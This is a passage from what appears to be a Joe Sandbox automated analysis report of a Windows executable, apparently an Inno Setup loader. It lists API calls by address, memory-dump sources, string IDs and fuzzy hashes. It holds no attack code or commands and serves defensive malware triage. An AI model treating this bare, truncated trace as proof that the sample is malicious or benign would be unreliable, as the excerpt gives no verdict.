                                                                                                      • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                                      • DestroyWindow.USER32(00010434,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                                      • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                      • API String ID: 3586484885-3001827809
                                                                                                      • Opcode ID: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                                      • Instruction ID: d3376fcde1141b4290a3dca450fc2844fa47922897975e075ebf06e3b6db64eb
                                                                                                      • Opcode Fuzzy Hash: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                                      • Instruction Fuzzy Hash: 77411A71604204DFD714EBA9EE85B5A37B5EB48304F20427BF500BB2E1D7B8A855CB9D

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020924CC,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                                      • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020924CC,00409AD8,00000000), ref: 00409A70
                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                                      • GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                                      • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020924CC,00409AD8), ref: 00409AA4
                                                                                                        • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,020924CC), ref: 0040966C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                                      • String ID: D
                                                                                                      • API String ID: 3356880605-2746444292
                                                                                                      • Opcode ID: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                                      • Instruction ID: b58d0f6e2b8975977e6c7b71aada5392bea55c03070ce9fad3dcef5aa6d4018a
                                                                                                      • Opcode Fuzzy Hash: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                                      • Instruction Fuzzy Hash: EE1142B16402486EDB00EBE6CC42F9EB7ACEF49714F50013BB604F72C6DA785D048A69

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                                      • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                                      • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                                      • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                      • String ID:
                                                                                                      • API String ID: 730355536-0
                                                                                                      • Opcode ID: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                                      • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                                      • Opcode Fuzzy Hash: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                                      • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message
                                                                                                      • String ID: .tmp$y@
                                                                                                      • API String ID: 2030045667-2396523267
                                                                                                      • Opcode ID: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                                      • Instruction ID: 5e9257013af3d55ef2b6e359c41f87f67318ae2a4e6dbf07461b5d8c6de74657
                                                                                                      • Opcode Fuzzy Hash: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                                      • Instruction Fuzzy Hash: 3B41C030704200CFD311EF25DED1A1A77A5EB49304B214A3AF804B73E1CAB9AC11CBAD

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message
                                                                                                      • String ID: .tmp$y@
                                                                                                      • API String ID: 2030045667-2396523267
                                                                                                      • Opcode ID: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                                      • Instruction ID: 95bba075cf9db07042691c1556ef0613dbe482a65a3614fff4d0ead14828e6f7
                                                                                                      • Opcode Fuzzy Hash: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                                      • Instruction Fuzzy Hash: E341BE30700200DFC711EF65DED2A1A77A5EB49304B104A3AF804B73E2CAB9AC01CBAD

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                      • String ID: .tmp
                                                                                                      • API String ID: 1375471231-2986845003
                                                                                                      • Opcode ID: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                                      • Instruction ID: b240cf9bc22f775501a2d99da134be40bb2f76fb21a7d6e050461713caae6e8b
                                                                                                      • Opcode Fuzzy Hash: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                                      • Instruction Fuzzy Hash: 9E216774A00208ABDB05EFA1C8429DFB7B8EF88304F50457BE901B73C2DA3C9E058A65

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3934441357-0
                                                                                                      • Opcode ID: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                                      • Instruction ID: 20d0a63744b7af467993d3e8aec565234b7be2d060ba20bf9fd199bb98bd5a4e
                                                                                                      • Opcode Fuzzy Hash: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                                      • Instruction Fuzzy Hash: 8251D12294D2910FC7126B7849685A53FE0FE5331132E92FBC5C1AB1A3D27CA847D35B

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00402148), ref: 00402017
                                                                                                        • Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                                        • Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                                        • Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                                        • Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                                      • String ID:
                                                                                                      • API String ID: 296031713-0
                                                                                                      • Opcode ID: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                                      • Instruction ID: b272be6629c35a549fc4f1c5a19e6e0df2414f51bb24a7fd7fb800939d1160d0
                                                                                                      • Opcode Fuzzy Hash: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                                      • Instruction Fuzzy Hash: D4419CB2A40711DFDB108F69DEC562A77A0FB58314B25837AD984B73E1D378A842CB48

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                                                      • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLibraryLoadMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 2987862817-0
                                                                                                      • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                                      • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                                                      • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                                      • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                                                                      APIs
                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                                                      • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                                        • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020903AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$FilePointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 1156039329-0
                                                                                                      • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                                      • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                                                      • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                                      • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                                      • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 1948546556-0
                                                                                                      • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                                      • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                                                      • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                                      • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
APIs
• SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
• GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020903AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
Memory Dump Source
• Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
• Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
• Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
• Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
• Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
APIs
• VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
• VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
Memory Dump Source
• Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: Virtual$AllocFree
• String ID:
• API String ID: 2087232378-0
• Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
• Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
• Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
• Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
APIs
• GetSystemDefaultLCID.KERNEL32(00000000,004053B6), ref: 0040529F
  • Part of subcall function 00404CDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CF9
  • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
Memory Dump Source
• Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: DefaultInfoLoadLocaleStringSystem
• String ID:
• API String ID: 1658689577-0
• Opcode ID: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
• Instruction ID: b95c725f163960c8622ba1b0af82130980b93a97e76f79286a035b518bc8de08
• Opcode Fuzzy Hash: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
• Instruction Fuzzy Hash: 90314F75E01509ABCB00DF95C8C19EEB379FF84304F158577E815BB286E739AE068B98
APIs
• CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
Memory Dump Source
• Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
• Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
• Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
• Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
APIs
• CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
Memory Dump Source
• Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
• Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
• Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
• Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
Memory Dump Source
• Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
• Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
• Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
• Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020903AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
Memory Dump Source
• Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID:
• API String ID: 442123175-0
• Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
• Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
• Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
• Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
APIs
• FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
Memory Dump Source
• Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: FormatMessage
• String ID:
• API String ID: 1306739567-0
• Opcode ID: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
• Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
• Opcode Fuzzy Hash: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
• Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
APIs
• SetEndOfFile.KERNEL32(?,020A8000,0040AA59,00000000), ref: 004076B3
  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020903AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
Memory Dump Source
• Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
